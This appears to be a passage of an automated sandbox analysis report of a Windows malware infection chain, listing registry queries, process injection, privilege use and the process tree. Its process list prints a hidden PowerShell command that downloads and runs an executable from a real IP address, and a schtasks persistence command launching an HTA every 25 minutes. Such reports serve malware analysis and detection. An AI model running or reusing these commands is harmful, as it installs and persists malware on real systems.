Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4808 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\cmd.exe
PID 4808 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\cmd.exe
PID 4808 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\cmd.exe
PID 4808 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\mshta.exe
PID 4808 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\mshta.exe
PID 4808 wrote to memory of 716 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\mshta.exe
PID 4900 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4900 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4900 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 716 wrote to memory of 3420 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 716 wrote to memory of 3420 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 716 wrote to memory of 3420 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3420 wrote to memory of 928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE
PID 3420 wrote to memory of 928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE
PID 3420 wrote to memory of 928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE
PID 928 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 928 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 928 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 984 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe
PID 984 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe
PID 984 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe
PID 984 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 984 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 984 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 2900 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4480 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 984 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe
PID 984 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe
PID 984 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe
PID 984 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe
PID 984 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe
PID 984 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 2936 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 984 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe
PID 984 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe
PID 984 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe
PID 984 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe
PID 984 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe

"C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn Folnhmalct0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn Folnhmalct0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE

"C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe

"C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe"

C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe

"C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe"

C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe

"C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2900 -ip 2900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2900 -s 800

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe

"C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe"

C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe

"C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe

"C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe"

C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe

"C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

